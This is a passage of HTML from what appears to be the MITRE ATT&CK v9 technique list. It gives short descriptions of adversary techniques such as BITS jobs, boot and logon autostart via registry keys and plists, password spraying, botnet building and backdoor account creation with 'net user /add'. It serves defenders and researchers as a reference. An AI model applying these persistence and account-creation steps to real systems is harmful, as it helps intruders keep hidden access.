Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure. Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1197"> T1197 </a> </td> <td> <a href="/versions/v9/techniques/T1197"> BITS Jobs </a> </td> <td> Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through <a href="/versions/v9/techniques/T1559/001">Component Object Model</a> (COM). BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1547"> T1547 </a> </td> <td> <a href="/versions/v9/techniques/T1547"> Boot or Logon Autostart Execution </a> </td> <td> Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.  These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1547/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1547/001"> Registry Run Keys / Startup Folder </a> </td> <td> Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1547/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1547/002"> Authentication Package </a> </td> <td> Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1547/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1547/003"> Time Providers </a> </td> <td> Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1547/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1547/004"> Winlogon Helper DLL </a> </td> <td> Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in <code>HKLM\Software[\Wow6432Node\]\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> and <code>HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> are used to manage additional helper programs and functionalities that support Winlogon. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1547/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1547/005"> Security Support Provider </a> </td> <td> Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1547/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1547/006"> Kernel Modules and Extensions </a> </td> <td> Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.   </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1547/007"> .007 </a> </td> <td> <a href="/versions/v9/techniques/T1547/007"> Re-opened Applications </a> </td> <td> Adversaries may modify plist files to automatically run an application when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user logs into their machine after reboot. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at <code>~/Library/Preferences/com.apple.loginwindow.plist</code> and <code>~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist</code>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1547/008"> .008 </a> </td> <td> <a href="/versions/v9/techniques/T1547/008"> LSASS Driver </a> </td> <td> Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1547/009"> .009 </a> </td> <td> <a href="/versions/v9/techniques/T1547/009"> Shortcut Modification </a> </td> <td> Adversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1547/010"> .010 </a> </td> <td> <a href="/versions/v9/techniques/T1547/010"> Port Monitors </a> </td> <td> Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the <code>AddMonitor</code> API call to set a DLL to be loaded at startup. This DLL can be located in <code>C:\Windows\System32</code> and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to <code>HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors</code>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1547/011"> .011 </a> </td> <td> <a href="/versions/v9/techniques/T1547/011"> Plist Modification </a> </td> <td> Adversaries may modify plist files to run a program during system boot or user login. Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by &lt; &gt;. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as <code>/Library/Preferences</code> (which execute with elevated privileges) and <code>~/Library/Preferences</code> (which execute with a user's privileges). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1547/012"> .012 </a> </td> <td> <a href="/versions/v9/techniques/T1547/012"> Print Processors </a> </td> <td> Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe, during boot. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1547/013"> .013 </a> </td> <td> <a href="/versions/v9/techniques/T1547/013"> XDG Autostart Entries </a> </td> <td> Adversaries may modify XDG autostart entries to execute programs or commands during system boot. Linux desktop environments that are XDG compliant implement functionality for XDG autostart entries. These entries will allow an application to automatically start during the startup of a desktop environment after user logon. By default, XDG autostart entries are stored within the <code>/etc/xdg/autostart</code> or <code>~/.config/autostart</code> directories and have a .desktop file extension. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1547/014"> .014 </a> </td> <td> <a href="/versions/v9/techniques/T1547/014"> Active Setup </a> </td> <td> Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer. These programs will be executed under the context of the user and will have the account's associated permissions level. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1037"> T1037 </a> </td> <td> <a href="/versions/v9/techniques/T1037"> Boot or Logon Initialization Scripts </a> </td> <td> Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1037/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1037/001"> Logon Script (Windows) </a> </td> <td> Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system. This is done via adding a path to a script to the <code>HKCU\Environment\UserInitMprLogonScript</code> Registry key. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1037/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1037/002"> Logon Script (Mac) </a> </td> <td> Adversaries may use macOS logon scripts automatically executed at logon initialization to establish persistence. macOS allows logon scripts (known as login hooks) to be executed whenever a specific user logs into a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike <a href="/versions/v9/techniques/T1037/005">Startup Items</a>, a login hook executes as the elevated root user. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1037/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1037/003"> Network Logon Script </a> </td> <td> Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects. These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1037/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1037/004"> RC Scripts </a> </td> <td> Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1037/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1037/005"> Startup Items </a> </td> <td> Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1217"> T1217 </a> </td> <td> <a href="/versions/v9/techniques/T1217"> Browser Bookmark Discovery </a> </td> <td> Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1176"> T1176 </a> </td> <td> <a href="/versions/v9/techniques/T1176"> Browser Extensions </a> </td> <td> Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1110"> T1110 </a> </td> <td> <a href="/versions/v9/techniques/T1110"> Brute Force </a> </td> <td> Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1110/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1110/001"> Password Guessing </a> </td> <td> Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1110/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1110/002"> Password Cracking </a> </td> <td> Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. <a href="/versions/v9/techniques/T1003">OS Credential Dumping</a> is used to obtain password hashes, this may only get an adversary so far when <a href="/versions/v9/techniques/T1550/002">Pass the Hash</a> is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network. The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1110/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1110/003"> Password Spraying </a> </td> <td> Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1110/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1110/004"> Credential Stuffing </a> </td> <td> Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1612"> T1612 </a> </td> <td> <a href="/versions/v9/techniques/T1612"> Build Image on Host </a> </td> <td> Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote <code>build</code> request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1115"> T1115 </a> </td> <td> <a href="/versions/v9/techniques/T1115"> Clipboard Data </a> </td> <td> Adversaries may collect data stored in the clipboard from users copying information within or between applications. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1580"> T1580 </a> </td> <td> <a href="/versions/v9/techniques/T1580"> Cloud Infrastructure Discovery </a> </td> <td> An adversary may attempt to discover resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1538"> T1538 </a> </td> <td> <a href="/versions/v9/techniques/T1538"> Cloud Service Dashboard </a> </td> <td> An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1526"> T1526 </a> </td> <td> <a href="/versions/v9/techniques/T1526"> Cloud Service Discovery </a> </td> <td> An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1059"> T1059 </a> </td> <td> <a href="/versions/v9/techniques/T1059"> Command and Scripting Interpreter </a> </td> <td> Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of <a href="/versions/v9/techniques/T1059/004">Unix Shell</a> while Windows installations include the <a href="/versions/v9/techniques/T1059/003">Windows Command Shell</a> and <a href="/versions/v9/techniques/T1059/001">PowerShell</a>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1059/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1059/001"> PowerShell </a> </td> <td> Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1059/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1059/002"> AppleScript </a> </td> <td> Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents. These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1059/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1059/003"> Windows Command Shell </a> </td> <td> Adversaries may abuse the Windows command shell for execution. The Windows command shell (<a href="/versions/v9/software/S0106">cmd</a>) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1059/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1059/004"> Unix Shell </a> </td> <td> Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution. Unix shells can control every aspect of a system, with certain commands requiring elevated privileges. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1059/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1059/005"> Visual Basic </a> </td> <td> Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as <a href="/versions/v9/techniques/T1559/001">Component Object Model</a> and the <a href="/versions/v9/techniques/T1106">Native API</a> through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1059/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1059/006"> Python </a> </td> <td> Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the <code>python.exe</code> interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1059/007"> .007 </a> </td> <td> <a href="/versions/v9/techniques/T1059/007"> JavaScript </a> </td> <td> Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1059/008"> .008 </a> </td> <td> <a href="/versions/v9/techniques/T1059/008"> Network Device CLI </a> </td> <td> Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1092"> T1092 </a> </td> <td> <a href="/versions/v9/techniques/T1092"> Communication Through Removable Media </a> </td> <td> Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by <a href="/versions/v9/techniques/T1091">Replication Through Removable Media</a>. Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1586"> T1586 </a> </td> <td> <a href="/versions/v9/techniques/T1586"> Compromise Accounts </a> </td> <td> Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. <a href="/versions/v9/techniques/T1585">Establish Accounts</a>), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1586/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1586/001"> Social Media Accounts </a> </td> <td> Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. <a href="/versions/v9/techniques/T1585/001">Social Media Accounts</a>), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1586/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1586/002"> Email Accounts </a> </td> <td> Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct <a href="/versions/v9/techniques/T1598">Phishing for Information</a> or <a href="/versions/v9/techniques/T1566">Phishing</a>. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: <a href="/versions/v9/techniques/T1583/001">Domains</a>). </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1554"> T1554 </a> </td> <td> <a href="/versions/v9/techniques/T1554"> Compromise Client Software Binary </a> </td> <td> Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1584"> T1584 </a> </td> <td> <a href="/versions/v9/techniques/T1584"> Compromise Infrastructure </a> </td> <td> Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle. Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1584/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1584/001"> Domains </a> </td> <td> Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant. An adversary may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1584/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1584/002"> DNS Server </a> </td> <td> Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: <a href="/versions/v9/techniques/T1071">Application Layer Protocol</a>). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1584/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1584/003"> Virtual Private Server </a> </td> <td> Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1584/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1584/004"> Server </a> </td> <td> Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a <a href="/versions/v9/techniques/T1583/004">Server</a> or <a href="/versions/v9/techniques/T1583/003">Virtual Private Server</a>, adversaries may compromise third-party servers in support of operations. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1584/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1584/005"> Botnet </a> </td> <td> Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks. Instead of purchasing/renting a botnet from a booter/stresser service, adversaries may build their own botnet by compromising numerous third-party systems. Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale <a href="/versions/v9/techniques/T1566">Phishing</a> or Distributed Denial of Service (DDoS). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1584/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1584/006"> Web Services </a> </td> <td> Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control (<a href="/versions/v9/techniques/T1102">Web Service</a>) or <a href="/versions/v9/techniques/T1567">Exfiltration Over Web Service</a>. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1609"> T1609 </a> </td> <td> <a href="/versions/v9/techniques/T1609"> Container Administration Command </a> </td> <td> Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1613"> T1613 </a> </td> <td> <a href="/versions/v9/techniques/T1613"> Container and Resource Discovery </a> </td> <td> Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1136"> T1136 </a> </td> <td> <a href="/versions/v9/techniques/T1136"> Create Account </a> </td> <td> Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1136/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1136/001"> Local Account </a> </td> <td> Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the <code>net user /add</code> command can be used to create a local account. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1136/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1136/002"> Domain Account </a> </td> <td> Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the <code>net user /add /domain</code> command can be used to create a domain account. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1136/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1136/003"> Cloud Account </a> </td> <td> Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1543"> T1543 </a> </td> <td> <a href="/versions/v9/techniques/T1543"> Create or Modify System Process </a> </td> <td> Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services. On macOS, launchd processes known as <a href="/versions/v9/techniques/T1543/004">Launch Daemon</a> and <a href="/versions/v9/techniques/T1543/001">Launch Agent</a> are run to finish system initialization and load user specific parameters. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1543/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1543/001"> Launch Agent </a> </td> <td> Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. Per Apple’s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in <code>/System/Library/LaunchAgents</code>, <code>/Library/LaunchAgents</code>, and <code>$HOME/Library/LaunchAgents</code> . These launch agents have property list files which point to the executables that will be launched . </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1543/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1543/002"> Systemd Service </a> </td> <td> Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources. Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems. </td> </tr> <tr class="sub technique"> <td></td> <td> <a 